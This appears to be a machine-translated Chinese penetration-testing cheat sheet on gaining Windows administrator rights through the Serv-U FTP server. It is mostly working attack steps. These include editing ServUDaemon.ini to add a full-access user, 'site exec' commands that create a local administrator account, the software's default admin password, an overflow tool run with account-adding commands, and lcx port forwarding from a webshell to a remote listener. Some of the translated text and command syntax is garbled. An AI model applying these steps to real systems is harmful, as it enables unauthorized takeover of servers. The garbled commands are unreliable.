0x00 serv-u Profile
- Serv-U FTP Server, is a widely used FTP server software, supports 3x / 9x / ME / NT / 2K Windows so the whole series. FTP server can set up multiple defined user authority, home directory and log space size
- serv-u default installation directory: C: \ Program Files \ rhinosoft.com \ serv-U
- serv-u password file: ServUDaemon.ini
- Port Number: The default port is 43958
ServUDaemon.ini port in lccalsetuportNo =
0x01 FTP mention the right method
1, modified permissions
2, no permission to modify
3, serv-u ftp overflow local privilege escalation (using 6.0 and previous versions)
4, serv-u ftp port forwarding
0x02 have modify rights
The following steps:
1. If the installation serv-u
nmap port scan confirmation
2, check writable
general installation directory C: \ Program Files \ Serv-U \ SerUDaemon.ini
. 3, serv-u add users
in user4 = Add a system user
[USER=quan|1] //用户名
Password= //用户密码加密后的密文
HomeDir=c:\ftp\quan //目录
RelPaths=3
TimeOut=600 //超时时间设置
Maintenance=System //权限
Access1=C:\|RWAMELCDP //可访问的目录及权限
Access2=d:\|RWAMELCDP //可访问的目录及权限
Access3=e:\|RWAMELCDP //可访问的目录及权限
SKEYValues=
bit random character password = 2 + md5 (2-bit random character +123456)
4, connected to the target FTP server
ftp 目标IP地址 刚添加的用户密码
5, using the ftp command quote site exec
to add a user permission to join administrators group
quote site exec net user quan quan123 /add
quote site exec net localgroup administrators quan /add
No permission to modify 0x03
1, decryption using directly to md5
2, the default user name and password
account: LocalAdministrator, Password: #l@$ak#.lk; 0 @ P
command:
cmd / C User Quan quan123 NET / NET localgroup Administrators & Quan the Add / the Add
. 3 when not the default password
directly to the download SerUAdmin.exe
opened with winhex Find LocalAdministrator (select ANSI character) to find password
0x04 serv-u ftp overflow local privilege escalation (using 6.0 and previous versions)
The following steps:
1, provide the right tools generate an integrated tool serv_u.exe mention the right Serv-U
2, the first upload to the next letter serv_u.exe
such disc d is
3, Run
d:\serv_u.exe
d:\serv_u.exe “net user quan quan123 /add”
d:\serv_u.exe “net localgroup administrators quan /add”
Note that the command to have quotes
0x05 serv-u ftp port forwarding
1, lcx port forwarding
to run commands on the target LCX Webshell
lcx -slave yourIP 5000 127.0.0.1 43958
Running in the machine
lcx -listen 5000 21
2, the machine landed Serv_U
open local SERV_U fill in the IP 127.0.0.1
account write LocalAdministrator password #l@$ak#.lk; 0 @ P
0x06 Reference
https://blog.csdn.net/God_XiangYu/article/details/99692269
https://www.cnblogs.com/feizianquan/p/10891352.html